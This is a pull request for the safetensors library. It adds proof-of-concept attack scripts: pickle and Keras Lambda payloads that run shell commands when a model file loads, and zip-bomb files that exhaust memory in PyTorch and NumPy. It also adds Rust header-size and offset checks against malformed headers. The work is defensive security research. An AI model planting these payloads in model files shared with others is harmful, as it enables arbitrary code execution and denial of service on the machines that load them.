### PR TITLE
Creating a few range of attacks against classic formats.

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -3,3 +3,6 @@ Cargo.lock
 *.bin
 *.h5
 *.msgpack
+*.pt
+*.safetensors
+*.npz

--- a/attacks/README.md
+++ b/attacks/README.md
@@ -1,0 +1,59 @@
+The purpose of this directory is to showcase various attacks (and creating your own).
+
+
+# Torch Arbitrary code execution
+
+Try it out. This will create a seemingly innocuous `torch_ace.pt` file.
+```
+python torch_ace_create.py
+python torch_ace_get_pwned.py
+```
+
+# Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`)
+
+Try it out. This will create a seemingly innocuous `tf_ace.h5` file.
+```
+python tf_dos_create.py
+python tf_dos_get_pwned.py
+```
+
+# Torch Denial of Service (OOM kills the running process)
+
+Try it out. This will create a seemingly innocuous `torch_dos.pt` file.
+```
+python torch_dos_create.py
+python torch_dos_get_pwned.py
+```
+
+# Numpy Denial of Service (OOM kills the running process)
+
+Try it out. This will create a seemingly innocuous `numpy_dos.npz` file.
+```
+python numpy_dos_create.py
+python numpy_dos_get_pwned.py
+```
+
+# Safetensors abuse attempts
+
+In order to try and check the limits, we also try to abuse the current format.
+Please ssend ideas !
+
+A few things can be abused:
+- Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1).
+- Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least 
+  it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse).
+  Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2)
+- Proposal 3: The offsets could be negative, out of the file. This is all crashing by default.
+- Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok.
+                While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small
+                file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact
+                that the offsets must be contiguous and non overlapping.
+- Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against.
+- Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned).
+- Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary.
+
+```
+python safetensors_abuse_attempt_1.py
+python safetensors_abuse_attempt_2.py
+python safetensors_abuse_attempt_3.py
+```

--- a/attacks/numpy_dos_create.py
+++ b/attacks/numpy_dos_create.py
@@ -1,0 +1,10 @@
+from zipfile import ZIP_DEFLATED, ZipFile
+
+FILESIZE = 40 * 1000  # 40 Go
+BUFFER = b"\0" * 1000 * 1000  # 1Mo
+
+outfilename = "numpy_dos.npz"
+with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
+    with outzip.open("weights.npy", "w", force_zip64=True) as f:
+        for i in range(FILESIZE):
+            f.write(BUFFER)

--- a/attacks/numpy_dos_get_pwned.py
+++ b/attacks/numpy_dos_get_pwned.py
@@ -1,0 +1,15 @@
+import os
+
+import numpy as np
+
+filename = "numpy_dos.npz"
+
+print(
+    f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
+)
+print("Be careful this might crash your computer by reserving way too much RAM")
+input("Press Enter to continue")
+archive = np.load(filename)
+weights = archive["weight"]
+assert np.allclose(weights, np.zeros((2, 2)))
+print("The file looks fine !")

--- a/attacks/safetensors_abuse_attempt_1.py
+++ b/attacks/safetensors_abuse_attempt_1.py
@@ -1,0 +1,21 @@
+import torch
+from safetensors.torch import load_file, save_file
+
+filename = "safetensors_abuse_attempt_1.safetensors"
+
+
+def create_payload():
+    weights = {"weight": torch.zeros((2, 2))}
+    save_file(weights, filename)
+
+    with open(filename, "r+b") as f:
+        f.seek(0)
+        # Now the header claims 2**32 - xx even though the file is small
+        n = 1000
+        n_bytes = n.to_bytes(8, "little")
+        f.write(n_bytes)
+
+
+create_payload()
+# This properly crashes with an out of bounds exception.
+test = load_file(filename)

--- a/attacks/safetensors_abuse_attempt_2.py
+++ b/attacks/safetensors_abuse_attempt_2.py
@@ -1,0 +1,33 @@
+import datetime
+import json
+import os
+
+from safetensors.torch import load_file
+
+filename = "safetensors_abuse_attempt_2.safetensors"
+
+
+def create_payload():
+    shape = [2, 2]
+    n = shape[0] * shape[1] * 4
+
+    metadata = {
+        f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10)
+    }
+
+    binary = json.dumps(metadata).encode("utf-8")
+    n = len(binary)
+    n_header = n.to_bytes(8, "little")
+
+    with open(filename, "wb") as f:
+        f.write(n_header)
+        f.write(binary)
+        f.write(b"\0" * n)
+
+
+create_payload()
+
+print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
+start = datetime.datetime.now()
+test = load_file(filename)
+print(f"Loading the file took {datetime.datetime.now() - start}")

--- a/attacks/safetensors_abuse_attempt_3.py
+++ b/attacks/safetensors_abuse_attempt_3.py
@@ -1,0 +1,30 @@
+import datetime
+import json
+import os
+
+from safetensors.torch import load_file
+
+filename = "safetensors_abuse_attempt_2.safetensors"
+
+
+def create_payload():
+    shape = [200, 200]
+    n = shape[0] * shape[1] * 4
+
+    metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)}
+
+    binary = json.dumps(metadata).encode("utf-8")
+    n = len(binary)
+    n_header = n.to_bytes(8, "little")
+
+    with open(filename, "wb") as f:
+        f.write(n_header)
+        f.write(binary)
+        f.write(b"\0" * n)
+
+
+create_payload()
+print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
+start = datetime.datetime.now()
+test = load_file(filename)
+print(f"Loading the file took {datetime.datetime.now() - start}")

--- a/attacks/tf_ace_create.py
+++ b/attacks/tf_ace_create.py
@@ -1,0 +1,21 @@
+import tensorflow as tf
+
+
+def exec_(*args, **kwargs):
+    import os
+
+    os.system('echo "########################################\nI own you.\n########################################"')
+    return 10
+
+
+num_classes = 10
+input_shape = (28, 28, 1)
+
+model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
+
+
+###
+# model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
+
+model.save("tf_ace.h5")
+###

--- a/attacks/tf_ace_get_pwned.py
+++ b/attacks/tf_ace_get_pwned.py
@@ -1,0 +1,16 @@
+import base64
+import json
+
+import h5py
+import tensorflow as tf
+
+new_model = tf.keras.models.load_model("tf.h5")
+
+print("Transformers is not vulnerable to this, as it uses h5 directly.")
+print("Keras uses a pickled code of the function within the `h5` attrs of the file")
+print("Let's show you the marshalled code")
+
+with h5py.File("tf_ace.h5") as f:
+    data = json.loads(f.attrs["model_config"])
+    print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0]))
+    pass

--- a/attacks/torch_ace_create.py
+++ b/attacks/torch_ace_create.py
@@ -1,0 +1,25 @@
+import torch
+
+
+class BadDict(dict):
+    def __init__(self, src: str, **kwargs):
+        super().__init__(**kwargs)
+        self.src = src
+
+    def __reduce__(self):
+        return (
+            eval,
+            (f"os.system('{self.src}') or dict()",),
+            None,
+            None,
+            iter(self.items()),
+        )
+
+
+torch.save(
+    BadDict(
+        'echo "pwned your computer, I can do anything I want."',
+        **{"weight": torch.zeros((2, 2))},
+    ),
+    "torch_ace.pt",
+)

--- a/attacks/torch_ace_get_pwned.py
+++ b/attacks/torch_ace_get_pwned.py
@@ -1,0 +1,6 @@
+import torch
+
+weights = torch.load("torch_ace.pt")
+assert list(weights.keys()) == ["weight"]
+assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
+print("The file looks fine !")

--- a/attacks/torch_dos_create.py
+++ b/attacks/torch_dos_create.py
@@ -1,0 +1,22 @@
+import os
+from zipfile import ZIP_DEFLATED, ZipFile
+
+import torch
+
+FILESIZE = 40 * 1000  # 40 Go
+BUFFER = b"\0" * 1000 * 1000  # 1 Mo
+
+filename = "torch_dos_tmp.pt"
+torch.save({"weight": torch.zeros((2, 2))}, filename)
+
+
+with ZipFile(filename, "r") as torch_zip:
+    outfilename = "torch_dos.pt"
+    with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
+        outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read())
+        outzip.writestr("archive/version", torch_zip.open("archive/version").read())
+        with outzip.open("archive/data/0", "w", force_zip64=True) as f:
+            for i in range(FILESIZE):
+                f.write(BUFFER)
+
+os.remove(filename)

--- a/attacks/torch_dos_get_pwned.py
+++ b/attacks/torch_dos_get_pwned.py
@@ -1,0 +1,15 @@
+import os
+
+import torch
+
+filename = "torch_dos.pt"
+
+print(
+    f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
+)
+print("Be careful this might crash your computer by reserving way too much RAM")
+input("Press Enter to continue")
+weights = torch.load(filename)
+assert list(weights.keys()) == ["weight"]
+assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
+print("The file looks fine !")

--- a/bindings/python/src/lib.rs
+++ b/bindings/python/src/lib.rs
@@ -169,15 +169,8 @@ impl safe_open {
         // before making a copy within Python.
         let buffer = unsafe { MmapOptions::new().map(&file)? };
 
-        let arr: [u8; 8] = [
-            buffer[0], buffer[1], buffer[2], buffer[3], buffer[4], buffer[5], buffer[6], buffer[7],
-        ];
-        let n = u64::from_le_bytes(arr) as usize;
-        let string = std::str::from_utf8(&buffer[8..8 + n]).map_err(|e| {
+        let (n, metadata) = SafeTensors::read_metadata(&buffer).map_err(|e| {
             exceptions::PyException::new_err(format!("Error while deserializing header: {:?}", e))
-        })?;
-        let metadata: Metadata = serde_json::from_str(string).map_err(|e| {
-            exceptions::PyException::new_err(format!("Error while deserializing metadata: {:?}", e))
         })?;
 
         let offset = n + 8;

--- a/safetensors/src/tensor.rs
+++ b/safetensors/src/tensor.rs
@@ -5,6 +5,8 @@ use std::collections::HashMap;
 use std::fs::File;
 use std::io::{BufWriter, Write};
 
+const MAX_HEADER_SIZE: usize = 100_000_000;
+
 /// Possible errors that could occur while reading
 /// A Safetensor file.
 #[derive(Debug)]
@@ -13,10 +15,14 @@ pub enum SafeTensorError {
     InvalidHeader,
     /// The header does contain a valid string, but it is not valid JSON.
     InvalidHeaderDeserialization,
+    /// The header is large than 100Mo which is considered too large (Might evolve in the future).
+    HeaderTooLarge,
     /// The tensor name was not found in the archive
     TensorNotFound,
     /// Invalid information between shape, dtype and the proposed offsets in the file
     TensorInvalidInfo,
+    /// The offsets declared for tensor with name `String` in the header are invalid
+    InvalidOffset(String),
 }
 
 fn prepare<'hash, 'data>(
@@ -91,19 +97,36 @@ pub struct SafeTensors<'data> {
 
 impl<'data> SafeTensors<'data> {
     /// Given a byte-buffer representing the whole safetensor file
-    /// parses it and returns the Deserialized form (No Tensor allocation).
-    pub fn deserialize<'in_data>(buffer: &'in_data [u8]) -> Result<Self, SafeTensorError>
+    /// parses the header, and returns the size of the header + the parsed data.
+    pub fn read_metadata<'in_data>(
+        buffer: &'in_data [u8],
+    ) -> Result<(usize, Metadata), SafeTensorError>
     where
         'in_data: 'data,
     {
         let arr: [u8; 8] = [
             buffer[0], buffer[1], buffer[2], buffer[3], buffer[4], buffer[5], buffer[6], buffer[7],
         ];
-        let n = u64::from_le_bytes(arr) as usize;
+        let n: usize = u64::from_le_bytes(arr)
+            .try_into()
+            .map_err(|_| SafeTensorError::HeaderTooLarge)?;
+        if n > MAX_HEADER_SIZE {
+            return Err(SafeTensorError::HeaderTooLarge);
+        }
         let string =
             std::str::from_utf8(&buffer[8..8 + n]).map_err(|_| SafeTensorError::InvalidHeader)?;
         let metadata: Metadata = serde_json::from_str(string)
             .map_err(|_| SafeTensorError::InvalidHeaderDeserialization)?;
+        metadata.validate()?;
+        Ok((n, metadata))
+    }
+    /// Given a byte-buffer representing the whole safetensor file
+    /// parses it and returns the Deserialized form (No Tensor allocation).
+    pub fn deserialize<'in_data>(buffer: &'in_data [u8]) -> Result<Self, SafeTensorError>
+    where
+        'in_data: 'data,
+    {
+        let (n, metadata) = SafeTensors::read_metadata(buffer)?;
         let data = &buffer[n + 8..];
         Ok(Self { metadata, data })
     }
@@ -164,6 +187,22 @@ impl Metadata {
         tensors: HashMap<String, TensorInfo>,
     ) -> Self {
         Self { metadata, tensors }
+    }
+
+    fn validate(&self) -> Result<(), SafeTensorError> {
+        let mut offsets: Vec<_> = self.tensors.iter().collect();
+
+        offsets.sort_by(|a, b| a.1.data_offsets.cmp(&b.1.data_offsets));
+        let mut start = 0;
+        for (tensor_name, info) in offsets {
+            let (s, e) = info.data_offsets;
+            if s != start || e < s {
+                return Err(SafeTensorError::InvalidOffset(tensor_name.to_string()));
+            }
+            start = e;
+        }
+
+        Ok(())
     }
 
     /// Gives back the tensor metadata
@@ -449,5 +488,56 @@ mod tests {
         assert_eq!(tensor.get_dtype(), Dtype::I32);
         // 16 bytes
         assert_eq!(tensor.get_data(), b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
+    }
+
+    #[test]
+    fn test_json_attack() {
+        let mut tensors = HashMap::new();
+        let dtype = Dtype::F32;
+        let shape = vec![2, 2];
+        let data_offsets = (0, 16);
+        for i in 0..10 {
+            tensors.insert(
+                format!("weight_{i}"),
+                TensorInfo {
+                    dtype,
+                    shape: shape.clone(),
+                    data_offsets,
+                },
+            );
+        }
+
+        let metadata = Metadata::new(None, tensors);
+        let serialized = serde_json::to_string(&metadata).unwrap();
+        let serialized = serialized.as_bytes();
+
+        let n = serialized.len();
+
+        let filename = "out.safetensors";
+        let mut f = BufWriter::new(File::create(filename).unwrap());
+        f.write_all(n.to_le_bytes().as_ref()).unwrap();
+        f.write_all(serialized).unwrap();
+        f.write_all(b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0").unwrap();
+        f.flush().unwrap();
+
+        let reloaded = std::fs::read(filename).unwrap();
+        match SafeTensors::deserialize(&reloaded) {
+            Err(SafeTensorError::InvalidOffset(_)) => {
+                // Yes we have the correct error, name of the tensor is random though
+            }
+            _ => panic!("This should not be able to be deserialized"),
+        }
+    }
+
+    #[test]
+    fn test_header_too_large() {
+        let serialized = b"<\x00\x00\x00\x00\xff\xff\xff{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+        match SafeTensors::deserialize(serialized) {
+            Err(SafeTensorError::HeaderTooLarge) => {
+                // Yes we have the correct error
+            }
+            _ => panic!("This should not be able to be deserialized"),
+        }
     }
 }


### PR DESCRIPTION
- pickle (ACE affecting PT)
- zip (Denial of Service affecting numpy + PT)
- marshal (affecting Keras, not directly in the h5 file format)

- Created 8 proposals to abuse the current format.
  Found 2 kind of flaws that could also cause some form of denial of
  service). PRs coming up.